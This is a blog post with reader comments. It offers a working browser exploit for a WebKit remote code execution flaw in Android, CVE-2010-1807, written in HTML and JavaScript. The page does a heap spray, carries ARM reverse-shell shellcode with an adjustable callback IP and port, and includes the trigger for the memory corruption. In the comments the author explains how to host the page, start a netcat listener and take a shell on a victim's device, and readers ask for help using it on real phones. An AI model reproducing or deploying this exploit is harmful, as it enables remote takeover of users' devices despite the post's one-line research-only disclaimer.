 |
| Follow me on twitter! |
I've written a new exploit, based on MJ's, with better success rate from my observation and easier to adjust to your ip/port.
This shellcode is using a 1 instruction nopsled, instead of ~1700 instructions+shellcode together, so understanding/adjusting the shellcode itself is easier.
<html>
<head>
<script>
//This code is only for security researches/teaching purposes,use at your own risk!
// bug = webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//patched= android 2.2, some said it works on some devices with 2.2.
//originally noticed/written by mj(good job man!)
//Found by Luke Wagner of Mozilla (Great work :))
//new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com
var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1
var port = unescape("\u3930"); //port 12345 (hex(0x3039))
//var ip = e.g: unescape("\u000a\u0202"); //ip = 10.0.2.2
function trigger()
{
var span = document.createElement("div");
document.getElementById("BodyID").appendChild(span);
span.innerHTML = -parseFloat("NAN(ffffe00572c60)"); //memory corruption when handling invalid values...
}
function exploit()
{
var nop = unescape("\u33bc\u0057"); //LDREQH R3,[R7],-0x3C for nopping
do
{
nop+=nop;
} while (nop.length<=0x1000);
var scode = nop+unescape("\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
scode += port;
scode += ip;
scode += unescape("\u2000\u2000");
target = new Array();
for(i = 0; i < 0x1000; i++)
target[i] = scode;
for (i = 0; i <= 0x1000; i++)
{
document.write(target[i]+"<i>");
if (i>0x999)
{
trigger();
}
}
}
</script>
</head>
<body id="BodyID">
Enjoy!
<script>
exploit();
</script>
</body>
</html>
The reason I've spent some time in writing this version is because now it's more flexible to changes, a bit more understandable of each goal/part of the exploit and the success rates are 20%-30% higher from what I've observed, also, shellcode is shorter and easier to analyze to see that there's no harm, etc. Feel free to play with the amount of memory to allocate.
Only for research/study purposes and not for using it on others.
Enjoy
Posts
17 comments:
gave it and shot and it worked for me. Nice work man.
hello thanks for the code, i'm newbie in javascript so if you can answer the next questions i'm would aprecciate it, questions: is a revershell connect?,in that case what type of listener i have to set, if you can make an example would be great, thanks and sorry for my bad english.
Hi mauro:
put this code under exploit.html in your server (which address should be 192.168.0.1 if you don't want to make changes in the code before you run it), and go to your device and connect to same wifi.
Now, open on your server nc listening on port 12345.
Go to your device and surf to : http://192.168.0.1/exploit.html
A shell should be opened on your nc without environment variables.
type for instance : /system/bin/ps
or /system/bin/id
I hope you understood...
good luck
also what do I need to learn to be able to edit this code? I have never been able to get a POC to work and I want to start learning more, do you have any resources for me to get started?
and when you say nc you mean netcat right?
Yeah, NC is netcat...
What would I suggest more to understand better? I think it's individual, so contact me in email and I will be happy to refer you to some sources on different stuff that might help.
For the NC (this time NC=NookColor), nobody tried your modified script yet. Maybe further explanations would be needed, sorry for that... First one (as I see it, and I might be wrong) might be exact JS code to run the series of your 'exploit1.html', 'exploit2.html', etc. Can be transition commands put within the exploit itself? Or I'm asking for too much?
Thank you anyway.
Does it work on ARM platforms shellcode?
Reverse Connection to NC, by running swelkodeueseo do?
thank you
This shellcode was built for ARM platform, yeah.
I'm not sure what did you mean by :"swelkodeueseo"... If you can please explain what did you mean?
Zuk thanks for the reply, I will try to see how it goes.Greetings
is it possible to rewrite the shellcode so it will work for x86
thank for you feed.
i can test it on emul. but real android phone doesn't working. how can i update exploit code. and do you have a avarble code on nexus 1, galaxy S, and any thing. if you help me. i catch a fantastic chance from customer. i really don't forgot it. please...
Should this work on earlier versions of Android as well? Also, is the address 'ffffe00572c60' uniquely powerful, or would any address in the last 8 bytes work?
hi, zuk
i am analyzing the cve-2010-1807 POC on your blog http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html.
i put the page in my server and try to debug the browser when surf the page on android emulator 2.1 ,but i don't know any debug tools for android (as ollydbg for windows). do you know any tools to debug the webkit browser in android ?
i am very appreciated for your reply :)
Hello, I am currently trying to replicate this exploit in a testing enviroment. I have a VM running 2.1. And a centos server acting as the web server. I have netcat listening like so: nc -l 12345
And when the android vm connects to the website, the web browser disappears and nothing happens on the server side. Help??
how come journal happens to be prevalent insomnia novel,insomnia xanax,insomniac gamers,insomniax mac,insomnia 47,insomnia cookies yale,insomnia cookies calories,insomnia zombie
Post a Comment